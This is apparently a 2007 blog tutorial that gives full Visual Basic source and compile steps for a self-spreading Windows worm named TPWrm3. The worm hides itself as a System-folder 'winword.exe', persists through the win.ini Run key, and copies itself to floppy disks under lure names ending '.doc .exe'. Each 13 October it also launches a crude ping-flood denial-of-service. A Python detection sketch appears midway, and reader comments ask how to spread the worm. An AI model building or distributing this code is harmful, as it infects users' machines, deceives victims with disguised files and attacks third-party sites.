TPWrm3

Written on June 5, 2007 by admin

This worm is named TPWrm3 (TutorialsPortal Worm 3). In this worm, I add a launcher trick that uses the Windows configuration file (win.ini), and I use an array for the worm filename so that the worm can copy itself under various filenames.

Algorithm

1. Check for worm existence

2. If the worm doesn’t find itself on the computer, it copies itself to the Windows System folder and modifies win.ini so that the worm is executed at every Windows startup.

3. Every 1 minute, it tries to copy itself to the floppy disk, using one of 10 filenames chosen at random.

4. Every 30 seconds, the cursor moves to the left corner of the monitor.

5. Every 13th of October, it shows “TPWrm3 in your computer..!” and tries to send a Denial of Service (DoS) to a website.

Coding

Create a new project. Change the Project Name to ‘TPWrm3’; in the Make tab, change the Application Title to ‘TPWrm3’. Select the option ‘Compile to P-Code’ in the Compile tab.

Add 2 Timer objects and 1 module. Change the properties to:

Form1
Name: frmTPWrm3
Icon: (icon)
ShowInTaskbar: False
Visible: False

Timer1
Name: TPWrm3
Enable: True
Interval: 60000

Timer2
Name: tmrJoke
Enable: True
Interval: 30000

Module1
Name: mdlFileIni

 

Write this source code to mdlFileIni:

Visual Basic:
  1. Declare Function GetPrivateProfileString Lib "kernel32" Alias _
  2. "GetPrivateProfileStringA" (ByVal lpApplicationName As _
  3. String, ByVal lpKeyName As String, ByVal lpDefault As String, _
  4. ByVal lpReturnedString As String, ByVal nSize As Long, ByVal _
  5. lpFileName As String) As Long
  6.  
  7. Declare Function WritePrivateProfileString Lib "kernel32" Alias _
  8. "WritePrivateProfileStringA" (ByVal lpApplicationName As _
  9. String, ByVal lpKeyName As String, ByVal lpString As Any, _
  10. ByVal lpFileName As String) As Long
  11.  
  12. Function ReadINI(Section, KeyName, filename As String) As String
  13. Dim sRet As String
  14. sRet = String(255, Chr(0))
  15. ReadINI = Left(sRet, GetPrivateProfileString(Section, ByVal _
  16. KeyName, "", sRet, Len(sRet), filename))
  17. End Function
  18.  
  19. Function writeini(sSection As String, sKeyName As String, _
  20. sNewString As String, sFileName) As Integer
  21. Dim r
  22. r = WritePrivateProfileString(sSection, sKeyName, sNewString, _
  23. sFileName)
  24. End Function

 

Write this source code to frmTPWrm3:

Visual Basic:
  1. 'TPWrm3 by RiE
  2. 'Bogor, West Java - Indonesia
  3. Option Explicit
  4.  
  5. Private Declare Function SetCursorPos Lib "user32" (ByVal x As _
  6. Long, ByVal Y As Long) As Long
  7.  
  8. Private Sub Form_Load()
  9. On Error Resume Next
  10. Dim kiddie As Variant
  11. Dim winfolder, sysfolder As Object
  12. Dim MainFile As String
  13. Set kiddie = CreateObject("scripting.filesystemobject")
  14. Set winfolder = kiddie.GetSpecialFolder(0)
  15. Set sysfolder = kiddie.GetSpecialFolder(1)
  16. MainFile = sysfolder & "\" & "winword.exe"
  17. If App.PrevInstance = True Then End
  18. If ReadINI("WINDOWS", "Run", winfolder & "\" & "win.ini") <> _
  19. MainFile Then
  20. Call InfectSystem
  21. End If
  22. If App.Path = "A:\" Or App.Path = "B:\" Then
  23. Unload Me
  24. End If
  25. End Sub
  26.  
  27. Private Sub InfectSystem()
  28. On Error Resume Next
  29. Dim kiddie As Variant
  30. Dim winfolder, sysfolder As Object
  31. Dim MainFile As String
  32. Set kiddie = CreateObject("scripting.filesystemobject")
  33. Set winfolder = kiddie.GetSpecialFolder(0)
  34. Set sysfolder = kiddie.GetSpecialFolder(1)
  35. MainFile = sysfolder & "\" & "winword.exe"
  36. FileCopy WormFile, MainFile
  37. SetAttr MainFile, vbHidden + vbReadOnly + vbSystem
  38. writeini "WINDOWS", "Run", MainFile, winfolder & "\" & "win.ini"
  39. End Sub
  40.  
  41. Private Sub InfectFloppy()
  42. On Error Resume Next
  43. Dim Acak As Integer
  44. Dim BeautifulName(10) As String
  45. BeautifulName(0) = "secret.doc .exe"
  46. BeautifulName(1) = "password.doc .exe"
  47. BeautifulName(2) = "sex.doc .exe"
  48. BeautifulName(3) = "britney spears nude.doc .exe"
  49. BeautifulName(4) = "fuck.doc .exe"
  50. BeautifulName(5) = "pussy.doc .exe"
  51. BeautifulName(6) = "nude.doc .exe"
  52. BeautifulName(7) = "public sex.doc .exe"
  53. BeautifulName(8) = "anal.doc .exe"
  54. BeautifulName(9) = "oral.doc .exe"
  55. Randomize
  56. Acak = Int(Rnd * 10)
  57. If Len(Dir$("A:\*.doc .exe")) = 0 Then
  58. FileCopy WormFile, "A:\" & BeautifulName(Acak)
  59. End If
  60. End Sub
  61.  
  62. Private Sub tmrJoke_Timer()
  63. On Error Resume Next
  64. SetCursorPos 1, 1
  65. End Sub
  66.  
  67. Private Sub tmrTPWrm3_Timer()
  68. On Error Resume Next
  69. Call InfectFloppy
  70. If Day(Now) = 13 And Month(Now) = 10 Then
  71. Call PayLoad
  72. Unload Me
  73. End If
  74. End Sub
  75.  
  76. Private Sub PayLoad()
  77. On Error Resume Next
  78. Dim Target As String
  79. Dim pingmore As Integer
  80. MsgBox "TPWrm3 in your computer..!", vbExclamation
  81. Target = "http://www.google.com"
  82. For pingmore = 1 To 1000
  83. Shell ("ping -a -l " & Target & " 65500")
  84. Next pingmore
  85. End Sub
  86.  
  87. Private Function WormFile()
  88. Dim WPath, WName As String
  89. WPath = App.Path
  90. If Right(WPath, 1) <> "\" Then
  91. WPath = WPath & "\"
  92. End If
  93. WName = App.EXEName & ".exe"
  94. WormFile = WPath & WName
  95. End Function

 

Compile it, File > Make TPWrm3.exe

 

Source Code Description

Visual Basic:
  1. 'TPWrm3 by RiE
  2. 'Bogor, West Java - Indonesia
  3. Option Explicit
  4.  
  5. Private Declare Function SetCursorPos Lib "user32" (ByVal x As _
  6. Long, ByVal Y As Long) As Long

This declares the SetCursorPos function from the user32 library; it is a Windows API function. SetCursorPos sets the cursor position on the screen.

 

Visual Basic:
  1. Private Sub Form_Load()
  2. On Error Resume Next
  3. Dim kiddie As Variant
  4. Dim winfolder, sysfolder As Object
  5. Dim MainFile As String
  6. Set kiddie = CreateObject("scripting.filesystemobject")
  7. Set winfolder = kiddie.GetSpecialFolder(0)
  8. Set sysfolder = kiddie.GetSpecialFolder(1)
  9. MainFile = sysfolder & "\" & "winword.exe"
  10. If App.PrevInstance = True Then End
  11. If ReadINI("WINDOWS", "Run", winfolder & "\" & "win.ini") <> _
  12. MainFile Then
  13. Call InfectSystem
  14. End If
  15. If App.Path = "A:\" Or App.Path = "B:\" Then
  16. Unload Me
  17. End If
  18. End Sub

The worm gets the Windows special folders, then checks whether another instance of the worm is already in memory.

The worm checks the Run key in the Windows section of win.ini; if it does not find the MainFile value there, it calls the InfectSystem procedure.

 

Visual Basic:
  1. Private Sub InfectSystem()
  2. On Error Resume Next
  3. Dim kiddie As Variant
  4. Dim winfolder, sysfolder As Object
  5. Dim MainFile As String
  6. Set kiddie = CreateObject("scripting.filesystemobject")
  7. Set winfolder = kiddie.GetSpecialFolder(0)
  8. Set sysfolder = kiddie.GetSpecialFolder(1)
  9. MainFile = sysfolder & "\" & "winword.exe"
  10. FileCopy WormFile, MainFile
  11. SetAttr MainFile, vbHidden + vbReadOnly + vbSystem
  12. writeini "WINDOWS", "Run", MainFile, winfolder & "\" & "win.ini"
  13. End Sub

The InfectSystem procedure uses the file system object to get the Windows special folders. The worm copies itself to the Windows System folder under the name ‘winword.exe’, then sets the file attributes to Hidden, Read-Only, and System.

The worm then modifies the Run key in the Windows section of win.ini, changing its value to the winword.exe path.

 

Visual Basic:
  1. Private Sub InfectFloppy()
  2. On Error Resume Next
  3. Dim Acak As Integer
  4. Dim BeautifulName(10) As String
  5. BeautifulName(0) = "secret.doc .exe"
  6. BeautifulName(1) = "password.doc .exe"
  7. BeautifulName(2) = "sex.doc .exe"
  8. BeautifulName(3) = "britney spears nude.doc .exe"
  9. BeautifulName(4) = "fuck.doc .exe"
  10. BeautifulName(5) = "pussy.doc .exe"
  11. BeautifulName(6) = "nude.doc .exe"
  12. BeautifulName(7) = "public sex.doc .exe"
  13. BeautifulName(8) = "anal.doc .exe"
  14. BeautifulName(9) = "oral.doc .exe"
  15. Randomize
  16. Acak = Int(Rnd * 10)
  17. If Len(Dir$("A:\*.doc .exe")) = 0 Then
  18. FileCopy WormFile, "A:\" & BeautifulName(Acak)
  19. End If
  20. End Sub

This procedure fills an array with 10 entries to use as filenames. We use social engineering here: the filenames use ‘.doc .exe’ as the extension because Windows Explorer will hide the real extension, so the worm will look like a Word document.
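Both behaviours described above, the Run entry that InfectSystem writes to the Windows section of win.ini and the ‘.doc .exe’ filenames used by InfectFloppy, leave artifacts a defender can check for. The following Python detection sketch is an added example, not part of the original post; the function names, the extension lists, and the sample win.ini text and filenames are constructed for illustration.

```python
import configparser
import re

# A document-style extension followed by an executable one, optionally
# separated by whitespace padding (the "name.doc .exe" pattern described above).
DISGUISED = re.compile(
    r"\.(docx?|xlsx?|pdf|txt|jpe?g)\s*\.(exe|scr|com|pif|bat|cmd)$",
    re.IGNORECASE,
)

# Constructed sample input, not taken from a real host.
SAMPLE_WIN_INI = r"""; for 16-bit app support
[fonts]
[extensions]
[windows]
Run=C:\WINDOWS\system32\winword.exe
load=
"""
SAMPLE_NAMES = ["secret.doc .exe", "report.doc", "setup.exe", "Invoice.PDF.scr"]


def is_disguised_executable(filename):
    """True when a name ends in a document extension plus an executable one."""
    return DISGUISED.search(filename.strip()) is not None


def winini_autostart_entries(ini_text):
    """Return (key, value) for each non-empty run=/load= in the [windows] section."""
    parser = configparser.ConfigParser(
        interpolation=None, strict=False, allow_no_value=True
    )
    parser.read_string(ini_text)
    findings = []
    for section in parser.sections():
        if section.lower() != "windows":  # INI section names are case-insensitive
            continue
        for key in ("run", "load"):  # configparser lower-cases option names
            value = (parser.get(section, key, fallback="") or "").strip()
            if value:
                findings.append((key, value))
    return findings


if __name__ == "__main__":
    for key, value in winini_autostart_entries(SAMPLE_WIN_INI):
        print(f"win.ini [windows] {key}= launches: {value}")
    for name in filter(is_disguised_executable, SAMPLE_NAMES):
        print(f"disguised executable name: {name!r}")
```

On NT-based Windows the win.ini run/load keys are mapped into the registry under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows, so the same values should be reviewed there as well as in the file.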

 

Visual Basic:
  1. Private Sub tmrJoke_Timer()
  2. On Error Resume Next
  3. SetCursorPos 1, 1
  4. End Sub
  5.  
  6. Private Sub tmrTPWrm3_Timer()
  7. On Error Resume Next
  8. Call InfectFloppy
  9. If Day(Now) = 13 And Month(Now) = 10 Then
  10. Call PayLoad
  11. Unload Me
  12. End If
  13. End Sub

The tmrJoke procedure calls the SetCursorPos function with the coordinates x=1 and y=1.

tmrTPWrm3 is the same as in the previous tutorial.

 

Visual Basic:
  1. Private Sub PayLoad()
  2. On Error Resume Next
  3. Dim Target As String
  4. Dim pingmore As Integer
  5. MsgBox "TPWrm3 in your computer..!", vbExclamation
  6. Target = "http://www.google.com"
  7. For pingmore = 1 To 1000
  8. Shell ("ping -a -l " & Target & " 65500")
  9. Next pingmore
  10. End Sub

Besides showing the message, this worm will send pings to Google.com.

 

Visual Basic:
  1. Private Function WormFile()
  2. Dim WPath, WName As String
  3. WPath = App.Path
  4. If Right(WPath, 1) <> "\" Then
  5. WPath = WPath & "\"
  6. End If
  7. WName = App.EXEName & ".exe"
  8. WormFile = WPath & WName
  9. End Function

The WormFile function is the same as in the previous tutorial.

2 Comments on “TPWrm3”

  1. artur |

    i can’t compile since there are some syntax errors
    need help
    plz write as soon as possible

  2. Yam |

    How will it spread globally huh!
